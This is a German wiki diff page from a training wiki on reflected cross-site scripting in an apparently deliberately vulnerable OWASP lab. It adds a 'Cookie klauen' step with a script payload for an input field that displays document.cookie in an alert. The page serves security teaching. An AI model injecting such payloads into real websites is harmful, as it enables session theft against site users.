X-Crossite-Scripting: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 10: Zeile 10:
 
[[Datei:Owasp-xss-2.png]]
 
[[Datei:Owasp-xss-2.png]]
 
=Cookie klauen=
 
=Cookie klauen=
 +
;Das muss ins Eingabefeld
 +
*<script>alert('Cookies which do not have the HTTPOnly attribute set: ' + document.cookie);</script>
 
[[Datei:Owasp-xss-3.png]]
 
[[Datei:Owasp-xss-3.png]]

Version vom 16. Juni 2021, 17:03 Uhr

Schwachstelle

  • OWASP2017
    • A7-Cross-Site-Scripting(XSS)
      • Reflected First Order
          • DNS LOOKUP

Testen ob Anwendung verwundbar ist

Owasp-xss-1.png

Es geht ein Fenster auf - Seite ist verwundbar

Owasp-xss-2.png

Cookie klauen

Das muss ins Eingabefeld
  • <script>alert('Cookies which do not have the HTTPOnly attribute set: ' + document.cookie);</script>

Owasp-xss-3.png